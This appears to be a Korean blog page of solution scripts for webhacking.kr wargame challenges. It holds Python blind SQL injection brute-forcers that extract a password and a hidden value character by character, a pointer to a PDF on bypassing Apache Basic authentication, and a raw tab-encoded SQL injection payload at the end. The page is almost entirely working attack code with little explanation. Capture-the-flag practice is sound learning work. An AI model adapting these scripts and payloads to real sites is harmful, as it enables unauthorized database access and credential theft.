BinaryU

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/challenge/bonus/bonus-1/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password="4348414c4c454e47453535434c6561727e7e4b4b"

for j in range(21, 50):
   for i in range(32,127):
      ii=hex(i)
      iii=ii[2:4]
      print ii
      if i < 99999 or i > 96:
          url1="http://webhacking.kr/challenge/web/web-31/rank.php?score=0 and ip=0x6c6f63616c686f7374 and left(pAsSw0RdzzzZ,%d)=0x" %j
          url2="%s" %password
          url3=url1+url2+"%s" %iii
          print url3
          req=urllib2.Request(url3)
          req.add_header('Cookie',"notice=yes; PHPSESSID=0be9e96926e7403cbc78d8b72499be3d")
          read=urllib2.urlopen(req).read()
          ok = re.findall("localhost",read)
          if ok:
              password=password+"%s" %iii
              print password
              break

Apache HTTP Basic Authorization Bypass

bypass_apache_web_authorization.pdf

9번 문제는 일단 인증을 우회하고 들어간다음...

본격적으로 문제를 풀어야 하는데...

인증에서 부터 막히는 사람들이 꽤 많은것 같다...

그런 사람들은 위 pdf 문서를 먼저 참고하면 좋겠다.

import urllib,urllib2,ClientCookie

params = urllib.urlencode({'id':"ID",
                           'pw':"PW"})

request = urllib2.Request("http://webhacking.kr/index.html", params)
response = ClientCookie.urlopen(request)
data = response.read()

pos = data.find("<!-- http://webhacking.kr/blog.php -->")

ch = ['/', '.', '0', '2', 'a', 'c', 'e', 'f', 'g', 'h', 'l', 'p', 'r', 't', 'w']

#0 2 a c e f g h l p r t w

answer = "w"

#<a href=?read=admin>readme

if pos > 0:
    print "Login Failed"
else:
    print "Login Success"
    for k in range(0, 32):
        for i in range(0, 14):
            paramsProblem = urllib.urlencode({'search':answer+ch[i]})
            print answer+ch[i]
            requestProblem = urllib2.Request("http://webhacking.kr/challenge/web/web-33/index.php", paramsProblem)
            responseProblem = ClientCookie.urlopen(requestProblem)
            dataProblem = responseProblem.read()
            posProblem = dataProblem.find("read=admin")
            if posProblem > 0:
                print ch[i]
                answer += ch[i]
                break
            else:
                print "trying : ", ch[i]
print answer

첨부파일을 C:\Python27\Lib\site-packages에 풀어 넣는다.

clientcookie.zip

no=-1||id%09like%090x6125%26%26pw%09like%090x6625&id=a&pw=a